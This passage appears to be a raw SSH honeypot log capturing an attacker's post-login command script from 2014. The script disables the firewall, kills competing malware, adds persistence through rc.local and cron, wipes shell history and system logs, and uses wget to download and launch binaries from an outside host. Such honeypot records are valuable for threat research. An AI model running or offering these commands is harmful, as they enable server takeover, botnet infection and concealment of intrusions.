  683.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  684.     nohup /tmp/byv832 > /dev/null 2>&1&
  685.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  686.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  687.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  688.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  689.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  690.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  691.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  692.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  693.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  694.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  695.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  696.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  697.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  698.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  699.     echo "unset MAILCHECK" >> /etc/profile
  700.     cd /etc;chattr +i sfewfesfs
  701.     rm -rf /root/.bash_history
  702.     touch /root/.bash_history
  703.     history -r
  704.     cd /var/log > dmesg
  705.     cd /var/log > auth.log
  706.     cd /var/log > alternatives.log
  707.     cd /var/log > boot.log
  708.     cd /var/log > btmp
  709.     cd /var/log > cron
  710.     cd /var/log > cups
  711.     cd /var/log > daemon.log
  712.     cd /var/log > dpkg.log
  713.     cd /var/log > faillog
  714.     cd /var/log > kern.log
  715.     cd /var/log > lastlog
  716.     cd /var/log > maillog
  717.     cd /var/log > user.log
  718.     cd /var/log > Xorg.x.log
  719.     cd /var/log > anaconda.log
  720.     cd /var/log > yum.log
  721.     cd /var/log > secure
  722.     cd /var/log > wtmp
  723.     cd /var/log > utmp
  724.     cd /var/log > messages
  725.     cd /var/log > spooler
  726.     cd /var/log > sudolog
  727.     cd /var/log > aculog
  728.     cd /var/log > access-log
  729.     cd /root > .bash_history
  730.     history -c"
  731. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
  732.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  733.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  734.     apt-get -y install wget
  735.     yum -y install wget
  736.     chmod 7777 / etc
  737.     killall -9 .IptabLes
  738.     killall -9 nfsd4
  739.     killall -9 profild.key
  740.     cd /etc;rm -rf dir fake.cfg
  741.     killall -9 nfsd
  742.     killall -9 DDosl
  743.     killall -9 lengchao32
  744.     killall -9 b26
  745.     killall -9 khelper
  746.     killall -9 Bill
  747.     killall -9 n26
  748.     killall -9 007
  749.     killall -9 codelove
  750.     killall -9 32
  751.     killall -9 m32
  752.     killall -9 m64
  753.     killall -9 64
  754.     killall -9 83BOT
  755.     killall -9 82BOT
  756.     killall -9 dos64
  757.     killall -9 dos32
  758.     killall -9 new6
  759.     killall -9 new4
  760.     killall -9 node24
  761.     killall -9 mimi
  762.     killall -9 nodeJR-1
  763.     killall -9 freeBSD
  764.     killall -9 ksapdd
  765.     killall -9 106
  766.     killall -9 09
  767.     killall -9 xsw
  768.     killall -9 syslogd
  769.     killall -9 skysapdd
  770.     killall -9 cupsddd
  771.     killall -9 ksapd
  772.     killall -9 atddd
  773.     killall -9 xfsdxd
  774.     killall -9 sfewfesfs
  775.     killall -9 gfhjrtfyhuf
  776.     killall -9 rewgtf3er4t
  777.     killall -9 fdsfsfvff
  778.     killall -9 smarvtd
  779.     killall -9 whitptabil
  780.     killall -9 gdmorpen
  781.     cd /etc;chattr -i 66
  782.     cd /root; chmod 7777 / etc
  783.     killall -9 minerd
  784.     killall -9 syn
  785.     killall -9 joudckfr
  786.     killall -9 www
  787.     killall -9 log
  788.     killall -9 .IptabLes
  789.     killall -9 .IptabLex
  790.     killall -9 .Mm2
  791.     killall -9 acpid
  792.     killall -9 m64
  793.     killall -9 ./QQ
  794.     killall -9 aabb
  795.     killall -9 g3
  796.     killall -9 S99local
  797.     killall -9 3
  798.     killall -9 pm
  799.     killall -9 qweasd
  800.     killall -9 tangtang
  801.     killall -9 imap-login
  802.     killall -9 xudp
  803.     killall -9 sshpa
  804.     killall -9 008
  805.     killall -9 txma
  806.     killall -9 mrdos64.b00
  807.     killall -9 mrdos32.b00
  808.     killall -9 kkpklp
  809.     killall -9 kiilp
  810.     killall -9 xin1
  811.     killall -9 jibateng
  812.     killall -9 syscore.sh
  813.     killall -9 syscore.sh
  814.     killall -9 syscore.sh
  815.     killall -9 .mimeo
  816.     killall -9 .mimeo
  817.     killall -9 .mimeo
  818.     killall -9 .mimeop
  819.     killall -9 .task1
  820.     killall -9 .mimeop
  821.     killall -9 .IptabLes
  822.     killall -9 .IptabLex
  823.     killall -9 .IptabLes
  824.     killall -9 .IptabLex
  825.     killall -9 .IptabLes
  826.     killall -9 .IptabLex
  827.     killall -9 .IptabLes
  828.     killall -9 .IptabLex
  829.     cd /root;rm -rf dir nohup.out
  830.     cd /etc;rm -rf dir fake.cfg
  831.     cd /etc;rm -rf dir cupsddd.*
  832.     cd /etc;rm -rf dir atddd.*
  833.     cd /etc;rm -rf dir ksapdd.*
  834.     cd /etc;rm -rf dir kysapdd.*
  835.     cd /etc;rm -rf dir sksapdd.*
  836.     cd /etc;rm -rf dir skysapdd.*
  837.     cd /etc;rm -rf dir xfsdxd.*
  838.     cd /etc;rm -rf dir fake.cfg
  839.     cd /etc;rm -rf dir cupsdd.*
  840.     cd /etc;rm -rf dir atdd.*
  841.     cd /etc;rm -rf dir ksapd.*
  842.     cd /etc;rm -rf dir kysapd.*
  843.     cd /etc;rm -rf dir sksapd.*
  844.     cd /etc;rm -rf dir skysapd.*
  845.     cd /etc;rm -rf dir xfsdx.*
  846.     cd /etc;rm -rf dir sfewfesfs
  847.     cd /etc;rm -rf dir gfhjrtfyhuf
  848.     cd /etc;rm -rf dir rewgtf3er4t
  849.     cd /etc;rm -rf dir fdsfsfvff
  850.     cd /etc;rm -rf dir smarvtd
  851.     cd /etc;rm -rf dir whitptabil
  852.     cd /etc;rm -rf dir gdmorpen
  853.     cd /etc;rm -rf dir sfewfesfs.*
  854.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  855.     cd /etc;rm -rf dir rewgtf3er4t.*
  856.     cd /etc;rm -rf dir fdsfsfvff.*
  857.     cd /etc;rm -rf dir smarvtd.*
  858.     cd /etc;rm -rf dir whitptabil.*
  859.     cd /etc;rm -rf dir gdmorpen.*
  860.     cd /etc;rm -rf dir nhgbhhj.*
  861.     cd /tmp;rm -rf dir 1.*
  862.     cd /tmp;rm -rf dir 2.*
  863.     cd /tmp;rm -rf dir 3.*
  864.     cd /tmp;rm -rf dir 4.*
  865.     cd /tmp;rm -rf dir 5.*
  866.     cd /tmp;rm -rf dir jdhe
  867.     cd /tmp;rm -rf dir jdhe.*
  868.     cd /var/spool/cron; rm -rf dir root.*
  869.     cd /var/spool/cron; rm -rf dir root
  870.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  871.     cd /var/spool/cron/crontabs; rm -rf dir root
  872.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  873.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  874.     yes|mv /tmp/root /var/spool/cron
  875.     yes|mv /tmp/root /var/spool/cron/crontabs
  876.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  877.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  878.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  879.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  880.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  881.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  882.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  883.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  884.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj